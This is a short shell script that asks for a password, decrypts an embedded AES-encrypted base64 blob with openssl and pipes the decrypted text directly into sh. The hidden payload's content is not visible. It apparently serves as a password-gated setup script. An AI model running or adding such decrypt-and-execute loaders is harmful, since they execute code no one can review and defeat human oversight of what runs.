#!/bin/sh
set -e
if ! command -v openssl >/dev/null 2>&1; then echo "Error: openssl required"; exit 1; fi
printf "Password: " > /dev/tty; stty -echo < /dev/tty 2>/dev/null || true; read PASSWORD < /dev/tty; stty echo < /dev/tty 2>/dev/null || true; echo "" > /dev/tty
PAYLOAD=$(cat <<'INITS_PAYLOAD'
U2FsdGVkX1/WVoAwG5GcSRaBmZImSZFjJuVHXH/spEFoPy8lh2yUVUzA2TpTel9V
gVaH5cU0nJoF03WQsXpqAAeHeN4/PMQBHNUTeO5mx4BScPDReDpME+pv+6tUkWMZ
Mg2TpB8+pfYzNPBwoCHPMMEO8cAlU9afKtjyF6yeF2OXTnhP+GozbvimTON6KhnF
6InxQKEAe1ybHze0/CRnkGRdFC9QVpbHUOCAMRQO23+pC6NNtCck3BHiotXjMcGg
MB/UICD8HrNno5IOmSmv2tZ7WypmvA9MNGI4KJoBi9deUtLcmqGMIwBViOzHzK09
vR6rszWDnwptjDHzNS3TKK1ix/e69AUHNWis3VOj86g3rJ5pwb2s6luXdJtiDkSe
gLFPzXwKEO0Bjzqr3LEmMyBZsGw5/KtJ4CQ+ksRA5fXFaO1AW7jo/c/X99IleF1w
a88DC9dntkoyZkrlrQYQu3h5JaWRDBKJn5bCOyAScUM=
INITS_PAYLOAD
)
DECRYPTED=$(printf '%s\n' "$PAYLOAD" | openssl enc -aes-256-cbc -d -a -pbkdf2 -iter 100000 -k "$PASSWORD" 2>/dev/null) || { echo "Error: Decryption failed. Wrong password?"; exit 1; }
echo "$DECRYPTED" | sh
